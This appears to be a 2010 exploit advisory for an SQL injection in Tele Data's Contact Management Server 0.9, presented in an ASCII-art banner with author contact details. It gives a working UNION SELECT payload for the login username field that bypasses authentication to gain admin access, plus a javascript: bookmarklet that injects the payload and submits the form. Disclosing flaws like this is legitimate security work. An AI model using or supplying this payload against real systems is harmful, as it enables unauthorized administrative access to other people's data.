|=================================================================================================|
|      ___           ___           ___                       ___           ___           ___      |
|     /\  \         /\  \         /\__\          ___        /\  \         /\  \         /\  \     |
|    /::\  \       /::\  \       /::|  |        /\  \      /::\  \       /::\  \       /::\  \    |
|   /:/\:\  \     /:/\:\  \     /:|:|  |        \:\  \    /:/\:\  \     /:/\:\  \     /:/\:\  \   |
|  /:/  \:\  \   /:/  \:\  \   /:/|:|  |__      /::\__\  /::\~\:\  \   /::\~\:\  \   /::\~\:\  \  |
| /:/__/ \:\__\ /:/__/ \:\__\ /:/ |:| /\__\  __/:/\/__/ /:/\:\ \:\__\ /:/\:\ \:\__\ /:/\:\ \:\__\ |
| \:\  \  \/__/ \:\  \ /:/  / \/__|:|/:/  / /\/:/  /    \/__\:\ \/__/ \:\~\:\ \/__/ \/_|::\/:/  / |
|  \:\  \        \:\  /:/  /      |:/:/  /  \::/__/          \:\__\    \:\ \:\__\      |:|::/  /  |
|   \:\  \        \:\/:/  /       |::/  /    \:\__\           \/__/     \:\ \/__/      |:|\/__/   |
|    \:\__\        \::/  /        /:/  /      \/__/                      \:\__\        |:|  |     |
|     \/__/         \/__/         \/__/                                   \/__/         \|__|     |
|                                                                                                 |
|=================================================================================================|
|                                                                                                 |
| Vulnerability............SQL Injection                                                          |
| Software.................Tele Data's Contact Management Server 0.9                              |
| Download.................http://teledata.qc.ca/td_cms/TD_CMS_SETUPEX.exe                        |
| Date.....................4/28/10                                                                |
|                                                                                                 |
|=================================================================================================|
|                                                                                                 |
| Site.....................http://cross-site-scripting.blogspot.com/                              |
| Email....................john.leitch5@gmail.com                                                 |
|                                                                                                 |
|=================================================================================================|
|
| ##Description##
|
| There isn't much in the way of security here. It's possible to log in with admin priviledges by
| injecting SQL into the username field. As there are client side length contstraints in place for
| the username field I packaged the exploit in some javascript for ease of use.
|
|
| ##Exploit##                                                                                     
|
| ' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--
|
|
| ##Proof of Concept##     
|
| javascript:document.forms[0][0].setAttribute("value","' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--");document.forms[0].submit();
|
|=================================================================================================|